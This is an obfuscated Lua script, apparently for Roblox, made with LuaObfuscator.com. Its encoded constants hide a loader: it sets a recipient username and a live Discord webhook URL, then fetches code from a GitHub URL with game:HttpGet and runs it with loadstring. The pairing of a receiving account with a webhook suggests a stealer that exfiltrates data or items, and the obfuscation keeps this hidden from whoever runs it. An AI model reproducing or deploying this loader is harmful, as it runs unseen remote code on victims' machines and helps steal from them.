--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v120=v5(v89,v19);v19=nil;return v120;else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/(((6 -1) -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-(1066 -(68 + 997)))) + (620 -(555 + 64)))) ;return v90-(v90%1) ;else local v91=931 -(857 + 74) ;local v92;while true do if (v91==(568 -(330 + 37 + 201))) then v92=(929 -(214 + (1983 -(226 + 1044))))^(v32-((4 -3) + 0)) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(467 -(87 + 263)) -(32 + 85) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -(181 -(67 + 113))) ;v35=1 -(0 + 0) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v41 * 16777216) + (v40 * (260471 -194935)) + (v39 * (1208 -((2159 -1357) + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(1 + 0) -0 ;local v45=(v20(v43,1,15 + 5 ) * ((999 -((1353 -(145 + 293)) + 82))^((520 -(44 + 386)) -58))) + v42 ;local v46=v20(v43,21,19 + 12 );local v47=((v20(v43,32)==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==0) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=0;end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * ((3 -(1488 -(998 + 488)))/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((444 -(416 + 26))^(165 -(199 -86))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=773 -(201 + 571) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if ((0 -0)~=v102) then else local v115=(function() return 0 + 0 ;end)();while true do if (v115~=0) then else v93=(function() return 438 -(262 + 176) ;end)();v94=(function() return nil;end)();v115=(function() return 1722 -(345 + 1376) ;end)();end if ((689 -(198 + 490))~=v115) then else v102=(function() return 2 -1 ;end)();break;end end end if (1==v102) then local v116=(function() return 0 + 0 ;end)();while true do if (v116==(0 -0)) then while true do if (v93==(0 -0)) then v94=(function() return v95();end)();if (v96(v94, #"!", #">")==(0 -0)) then local v139=(function() return 0 -0 ;end)();local v140=(function() return;end)();local v141=(function() return;end)();local v142=(function() return;end)();while true do if ((1207 -(696 + 510))~=v139) then else local v184=(function() return 0 -0 ;end)();while true do if (v184==(0 -0)) then v142=(function() return {v97(),v97(),nil,nil};end)();if (v140==(285 -(134 + 151))) then local v199=(function() return 1262 -(1091 + 171) ;end)();local v200=(function() return;end)();while true do if (v199~=(1665 -(970 + 695))) then else v200=(function() return 0 + 0 ;end)();while true do if (v200~=(0 -0)) then else v142[ #"91("]=(function() return v97();end)();v142[ #"?id="]=(function() return v97();end)();break;end end break;end end elseif (v140== #"[") then v142[ #"xnx"]=(function() return v98();end)();elseif (v140==2) then v142[ #"asd"]=(function() return v98() -((6 -4)^(390 -(123 + 251))) ;end)();elseif (v140~= #"-19") then else local v205=(function() return 0 -0 ;end)();local v206=(function() return;end)();while true do if (v205==(0 -0)) then v206=(function() return 1824 -(1195 + 629) ;end)();while true do if ((698 -(208 + 490))==v206) then v142[ #"19("]=(function() return v98() -((243 -(187 + 54))^(2 + 14)) ;end)();v142[ #"asd1"]=(function() return v97();end)();break;end end break;end end end v184=(function() return 1;end)();end if (v184~=(1 + 0)) then else v139=(function() return 2;end)();break;end end end if (v139==(2 + 0)) then if (v96(v141, #"~", #"{")~= #"~") then else v142[838 -(660 + 176) ]=(function() return v99[v142[2 + 0 ]];end)();end if (v96(v141,1 + 1 ,2)== #",") then v142[ #"-19"]=(function() return v99[v142[ #"91("]];end)();end v139=(function() return 205 -(14 + 188) ;end)();end if (v139==0) then v140=(function() return v96(v94,1 + 1 , #"nil");end)();v141=(function() return v96(v94, #"asd1",6);end)();v139=(function() return 1;end)();end if (v139~=(678 -(534 + 141))) then else if (v96(v141, #"gha", #"91(")== #"\\") then v142[ #"?id="]=(function() return v99[v142[ #"0313"]];end)();end v100[v101]=(function() return v142;end)();break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end end end;end)();local v52=(function() return function(v103,v104,v105) local v106=(function() return 0 + 0 ;end)();while true do if (v106==(0 + 0)) then local v117=(function() return 0;end)();while true do if (v117~=(0 + 0)) then else v103[v104-#"\\" ]=(function() return v105();end)();return v103,v104,v105;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"~",v57 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69==0) then local v109=(function() return 0;end)();while true do if (v109~=(1 -0)) then else v69=(function() return 1 -0 ;end)();break;end if ((0 + 0)==v109) then v70=(function() return v21();end)();v71=(function() return nil;end)();v109=(function() return 2 -1 ;end)();end end end if (v69==(342 -(218 + 123))) then if (v70== #"}") then v71=(function() return v21()~=0 ;end)();elseif (v70==(2 + 0)) then v71=(function() return v24();end)();elseif (v70== #"asd") then v71=(function() return v25();end)();end v58[v68]=(function() return v71;end)();break;end end end v56[ #"gha"]=(function() return v21();end)();for v72= #"~",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v72=(function() return v51(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v58,v53,v72);end)();end for v73= #"!",v23() do v54,v73,v28=(function() return v52(v54,v73,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 0 + 1 ];local v65=v60[3];return function(...) local v74=v63;local v75=v64;local v76=v65;local v77=v27;local v78=561 -(306 + 254) ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(1468 -(899 + 568)) ;local v83={};local v84={};for v107=0 + 0 + 0 + 0 ,v82 do if ((v107>=v76) or (1818==85)) then v80[v107-v76 ]=v81[v107 + 1 ];else v84[v107]=v81[v107 + (2 -1) ];end end local v85=(v82-v76) + (604 -(268 + (787 -452))) ;local v86;local v87;while true do local v108=290 -(60 + 230) ;while true do if (v108==(573 -(426 + 146))) then if ((630<2127) and (v87<=(1 + 4))) then if (v87<=(1458 -(282 + (2376 -(373 + 829))))) then if ((v87<=(811 -((1300 -(476 + 255)) + 242))) or (1938==2514)) then local v122=0 -0 ;local v123;local v124;local v125;local v126;local v127;while true do if (v122==(1 + 1)) then v126=v84[v86[1027 -(706 + 318) ]];v84[v127 + (1252 -(721 + 530)) ]=v126;v84[v127]=v126[v86[1275 -(945 + 326) ]];v78=v78 + (2 -1) ;v122=3 + (1130 -(369 + 761)) ;end if ((4255>=55) and (v122==6)) then v78=v78 + (701 -(271 + 429)) ;v86=v74[v78];v127=v86[2 + 0 ];v84[v127]=v84[v127](v13(v84,v127 + (1501 -(1408 + 92)) ,v79));v122=1093 -(461 + 625) ;end if ((2999>1156) and (v122==(1288 -(993 + 171 + 124)))) then v123=nil;v124,v125=nil;v126=nil;v127=nil;v122=1 + 0 ;end if (v122==4) then v84[v86[2]]=v86[1174 -(418 + 753) ]~=(0 + 0) ;v78=v78 + 1 + (0 -0) ;v86=v74[v78];v127=v86[1 + 1 ];v122=(3 -1) + 3 ;end if ((532 -(406 + 123))==v122) then v86=v74[v78];v84[v86[2]]=v86[3];v78=v78 + ((2008 -(64 + 174)) -(250 + 1499 + 20)) ;v86=v74[v78];v122=1 + 3 ;end if ((1327 -(1249 + 73))==v122) then v124,v125=v77(v84[v127](v13(v84,v127 + 1 + 0 ,v86[3])));v79=(v125 + v127) -(1146 -(466 + 679)) ;v123=0 -0 ;for v180=v127,v79 do v123=v123 + (2 -1) ;v84[v180]=v124[v123];end v122=1906 -(106 + 1794) ;end if (v122==((1 -0) + (336 -(144 + 192)))) then v84[v86[1 + 1 ]]=v62[v86[3]];v78=v78 + (2 -1) ;v86=v74[v78];v127=v86[5 -3 ];v122=116 -(4 + 110) ;end if (v122==(592 -(57 + 527))) then v86=v74[v78];v78=v86[3];break;end if (v122==(1434 -((257 -(42 + 174)) + 1386))) then v78=v78 + (104 -(17 + 86)) ;v86=v74[v78];v84[v86[2 + 0 ]]();v78=v78 + (1 -0) ;v122=23 -15 ;end end elseif (v87>(167 -(122 + 44))) then local v143=v86[2 -0 ];v84[v143]=v84[v143](v13(v84,v143 + 1 ,v79));elseif (v84[v86[2]]==v86[12 -8 ]) then v78=v78 + 1 + 0 ;else v78=v86[1 + 0 + 2 ];end elseif ((2350>1155) and (v87<=(5 -2))) then v84[v86[67 -(30 + 35) ]]=v86[3 + 0 ]~=(0 + 0) ;elseif ((4029<=4853) and (v87>(2 + 2))) then v84[v86[2]]=v86[1260 -(1043 + 214) ];else v84[v86[2]]=v62[v86[11 -(1512 -(363 + 1141)) ]];end elseif (v87<=(1220 -(323 + 889))) then if (v87<=(15 -(1589 -(1183 + 397)))) then v62[v86[583 -(361 + 219) ]]=v84[v86[322 -(53 + 267) ]];v78=v78 + 1 ;v86=v74[v78];v84[v86[1 + 1 ]]=v86[416 -(15 + 398) ];v78=v78 + (983 -(18 + 964)) ;v86=v74[v78];v62[v86[11 -8 ]]=v84[v86[2 + 0 ]];v78=v78 + (2 -1) + 0 ;v86=v74[v78];v84[v86[2]]=v86[853 -(20 + 830) ];v78=v78 + 1 + 0 ;v86=v74[v78];v78=v86[129 -(116 + 10) ];elseif (v87>(1 + 6)) then v62[v86[741 -(542 + 196) ]]=v84[v86[3 -1 ]];else do return;end end elseif (v87<=(3 + 7)) then if (v87>(5 + 4)) then local v151=0 + 0 ;local v152;local v153;local v154;local v155;while true do if ((v151==(0 -0)) or (516>3434)) then v152=v86[4 -2 ];v153,v154=v77(v84[v152](v13(v84,v152 + (1552 -(826 + 300 + 425)) ,v86[408 -(118 + 287) ])));v151=3 -(2 + 0) ;end if (v151==((3098 -(1913 + 62)) -(118 + 1003))) then for v192=v152,v79 do local v193=0 -0 ;while true do if (v193==(377 -(142 + 148 + 87))) then v155=v155 + (4 -3) ;v84[v192]=v153[v155];break;end end end break;end if (v151==(1 + 0)) then v79=(v154 + v152) -1 ;v155=0;v151=979 -((1463 -910) + 424) ;end end else v78=v86[5 -2 ];end elseif (v87==(10 + 1)) then local v157=1933 -(565 + 1368) ;local v158;local v159;while true do if (v157==(0 + 0)) then v158=v86[(7 -5) + 0 ];v159=v84[v86[2 + 1 ]];v157=1 + 0 ;end if ((2 -(1662 -(1477 + 184)))==v157) then v84[v158 + (2 -1) ]=v159;v84[v158]=v159[v86[8 -4 ]];break;end end else v84[v86[2]]();end v78=v78 + 1 ;break;end if ((4046>=3033) and (v108==(0 + 0))) then v86=v74[v78];v87=v86[4 -3 ];v108=754 -(239 + 514) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F6769746875622E636F6D2F646F736C6F626F6479646F6564792F782F626C6F622F6D61696E2F6D61696E2E6C756103083O00557365726E616D65030D3O00436F736D696347616D6572583003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323731323139303437383238302O333631372F785949635A4B4D496C4B596A436954484B6F426A50625975635F453574555361486567413554755650664E38467968722O7366454D6A325165426C467756484F576B522D00153O0012053O00013O0026013O000C000100020004093O000C0001001204000100033O00122O000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026013O0001000100010004093O00010001001205000100083O001206000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00073O00017O00",v9(),...);
